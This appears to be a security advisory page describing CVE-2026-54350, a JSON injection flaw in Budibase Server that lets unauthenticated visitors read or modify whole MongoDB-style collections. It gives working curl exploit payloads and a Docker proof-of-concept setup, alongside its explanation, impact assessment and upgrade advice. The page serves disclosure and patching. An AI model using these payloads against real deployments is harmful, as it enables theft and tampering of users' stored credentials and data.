Listen to this Post
How CVE-2026-54350 Works
CVE-2026-54350 is a critical unauthenticated JSON injection vulnerability affecting Budibase Server versions up to and including 3.39.0. The root cause lies in the way user-supplied parameters are substituted into the raw JSON body of a query before being passed to JSON.parse(). The validation routine `validateQueryInputs` only checks for Handlebars markers ({{ and }}) and does not escape JSON metacharacters such as quotes ("), backslashes (\), or braces (}). This allows an attacker to supply a parameter value that closes the original JSON structure and injects additional keys into the parsed filter object.
For MongoDB queries, the parsed filter is passed directly to `collection.find()` without any key prefix or operator allow-list. By injecting a duplicate key like "name": {"$exists": true}, the attacker overrides the builder’s intended filter (e.g., {name: "..."}) and causes the query to return every document in the collection. The same technique works against `updateMany` queries, widening the filter scope to the entire collection while the builder-controlled `$set` body executes against all matched documents.
The `authorized` middleware short-circuits authentication and CSRF checks when a query’s role is set to PUBLIC. The endpoint `POST /api/v2/queries/:queryId` accepts calls with no session, requiring only the `x-budibase-app-id` header, which is publicly available from the published app URL. Consequently, an unauthenticated visitor of any published Budibase app can read every document from the backing MongoDB, CouchDB, Elasticsearch, DynamoDB-PartiQL, or REST-with-JSON-body collection. If the builder has published a `PUBLIC` write query, the attacker can also modify every document in that collection with a single HTTP request.
SQL datasources (Postgres, MySQL, MSSQL, Oracle, MariaDB) are not affected because they use bind-parameterised interpolation. The vulnerability is reachable on any deployment where a workspace builder has set a non-SQL query to `PUBLIC` and published the app, a common low-code public-form use case.
DailyCVE Form:
Platform: Budibase Server
Version: <= 3.39.0
Vulnerability: JSON Injection
Severity: Critical
Date: 2026-05-20
Prediction: Patch 2026-06-23
What Undercode Say (Analytics)
- Affected Component: `@budibase/server` package
- Fixed Version: 3.39.12
- Attack Vector: Remote, unauthenticated
- Prerequisites: Published app with PUBLIC non-SQL query
- CWE: Improper Neutralization of Special Elements used in a JSON Input (CWE-116)
- Exploit Complexity: Low – one HTTP request
Exploit
- Read all documents via a PUBLIC read query:
curl -X POST "https://<budibase-host>/api/v2/queries/<read-queryId>" \ -H "x-budibase-app-id: <published-appId>" \ -H "Content-Type: application/json" \ -d '{"parameters":{"name":"x\",\"name\":{\"$exists\":true},\"$comment\":\"audit"}}'Expected response: All documents from the collection, including sensitive fields like
password_hash,secret,api_token,mfa_secret. - Modify all documents via a PUBLIC updateMany query:
curl -X POST "https://<budibase-host>/api/v2/queries/<updateMany-queryId>" \ -H "x-budibase-app-id: <published-appId>" \ -H "Content-Type: application/json" \ -d '{"parameters":{"name":"x\",\"name\":{\"$exists\":true},\"$comment\":\"esc"}}'Expected response: `{“matchedCount”: N, “modifiedCount”: N}` where `N` is the total number of documents in the collection.
PoC Setup (Docker):
docker run -d --name budibase -p 10000:80 budibase/budibase:latest
Builder creates MongoDB datasource, PUBLIC query GetUserByName with body {"name":"{{ name }}"}
Anonymous attacker sends the above curl to read all documents
Protection
- Upgrade `@budibase/server` to 3.39.12 or later.
- Rotate any exposed credentials: reset user passwords (
password_hash), rotate API tokens (api_token), reset stored secrets (secret) and MFA secrets (mfa_secret), rotate database/service credentials, and invalidate existing sessions/tokens. - Avoid setting non-SQL queries to `PUBLIC` role unless absolutely necessary; restrict public query exposure.
- Implement additional network-layer access controls to limit who can reach the `/api/v2/queries/` endpoints.
Impact
- Unauthenticated Data Exfiltration: An attacker can read every document from any backing MongoDB, CouchDB, Elasticsearch, DynamoDB-PartiQL, or REST-with-JSON-body collection reachable through a PUBLIC query, including columns the published query was not designed to return (e.g.,
password_hash,secret,api_token,mfa_secret). - Unauthenticated Data Manipulation: If the builder has published a PUBLIC
update,delete, or `aggregate` query, the attacker can modify or delete every document in that collection, far beyond the builder’s intended single-document scope. - One HTTP Request, No Session, No CSRF: The attack requires no user interaction, no session cookie, and bypasses CSRF protections, making it trivially exploitable.
- Widespread Reach: Any Budibase deployment with a published app using a PUBLIC non-SQL query is vulnerable – this is the canonical low-code public-form use case.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
